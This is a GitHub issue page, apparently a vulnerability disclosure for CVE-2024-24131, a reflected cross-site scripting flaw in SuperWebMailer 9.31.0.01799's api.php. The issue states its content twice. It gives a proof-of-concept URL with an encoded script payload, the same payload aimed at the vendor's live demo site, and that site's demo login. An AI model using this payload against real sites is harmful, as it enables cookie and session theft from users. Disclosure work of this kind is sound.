We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
SuperWebMailer 9.31.0.01799 has a reflective cross-site vulnerability.
SuperWebMailer in version 9.31.0.01799 has a reflection cross-site attack vulnerability caused by api.php directly referencing urls without filtering.
http://ip:port/api/api.php/%3Cscript%3Ealert(1)%3C/script%3E Test case https://newsletter-software-php-script.superwebmailer.de/api/api.php/%3Cscript%3Ealert(1)%3C/script%3E Zugangsdaten zur Anmeldung Benutzername: demo Kennwort: demo
If a user or administrator accesses the malicious url, the cookie may be obtained by an attacker.
The text was updated successfully, but these errors were encountered:
This is the vulnerability exploitation reference for CVE-2024-24131
Sorry, something went wrong.
No branches or pull requests
Summary
SuperWebMailer 9.31.0.01799 has a reflective cross-site vulnerability.
Details
SuperWebMailer in version 9.31.0.01799 has a reflection cross-site attack vulnerability caused by api.php directly referencing urls without filtering.
Proof of Concept (POC)
http://ip:port/api/api.php/%3Cscript%3Ealert(1)%3C/script%3E
Test case
https://newsletter-software-php-script.superwebmailer.de/api/api.php/%3Cscript%3Ealert(1)%3C/script%3E
Zugangsdaten zur Anmeldung
Benutzername: demo
Kennwort: demo
Impact
If a user or administrator accesses the malicious url, the cookie may be obtained by an attacker.
The text was updated successfully, but these errors were encountered: